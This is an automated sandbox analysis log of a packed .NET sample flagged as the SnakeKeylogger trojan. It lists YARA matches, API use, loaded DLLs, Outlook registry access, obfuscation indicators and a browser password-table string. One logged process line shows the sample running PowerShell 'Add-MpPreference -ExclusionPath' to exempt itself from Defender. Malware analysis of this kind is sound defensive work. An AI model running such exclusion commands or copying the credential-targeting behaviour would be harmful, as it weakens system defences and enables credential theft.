                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VBxvRIJIqICbqLQou1.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VBxvRIJIqICbqLQou1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VBxvRIJIqICbqLQou1.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, K7v8N7oaxfulbm8glp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, K7v8N7oaxfulbm8glp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VBxvRIJIqICbqLQou1.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VBxvRIJIqICbqLQou1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VBxvRIJIqICbqLQou1.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@4/3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.logJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghqruusq.dbt.ps1Jump to behavior
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000346D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000345D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000347B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: VZLk.pdb source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                Source: Binary string: VZLk.pdbSHA256 source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

                Data Obfuscation

                barindex
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, VentanaPrincipal.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VBxvRIJIqICbqLQou1.cs.Net Code: GDYoY6nRE9 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VBxvRIJIqICbqLQou1.cs.Net Code: GDYoY6nRE9 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.2501ae8.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24f56d0.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24a6fe8.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.4f50000.6.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic PE information: 0xF223B00A [Wed Sep 24 19:24:58 2098 UTC]
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_01699C30 push esp; retf 0309h5_2_01699D55
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB2DBF pushfd ; retf 5_2_06DB2DC1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeCode function: 5_2_06DB9241 push es; ret 5_2_06DB9244
                Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeStatic PE information: section name: .text entropy: 7.84421246743167
